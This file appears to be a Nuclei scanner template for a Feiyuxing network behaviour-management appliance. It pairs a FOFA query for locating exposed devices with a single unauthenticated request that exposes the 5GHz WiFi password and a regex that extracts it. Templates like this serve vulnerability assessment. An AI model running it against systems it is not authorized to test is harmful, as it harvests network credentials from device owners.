id: feiyuxing-info-leak

info:
  name: Feiyuxing Information - Exposure
  author: xc
  severity: high
  description: |
    Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords
  metadata:
    verified: "true"
    max-request: 1
    fofa-query: title="飞鱼星企业级智能上网行为管理系统"
  tags: misconfig,exposure,iot,wpa,wpa2

http:
  - method: GET
    path:
      - "{{BaseURL}}/request_para.cgi?parameter=wifi_get_5g_host"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body,"WPA2-PSK") || contains(body,"WPA-PSK")'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "\"wl_passwd_5g\":\"(.*?)\""

# digest: 4a0a00473045022024def7c98d8c3f84bff3da5bf59a7e7cc750b32574590afd4a3d7c5e0d7b8499022100be2b6cec86528d1cbdd6ea782fb9e2bc4be2b9a123562a00dbd1583b884faf21:922c64590222798bb761d5b6d8e72950
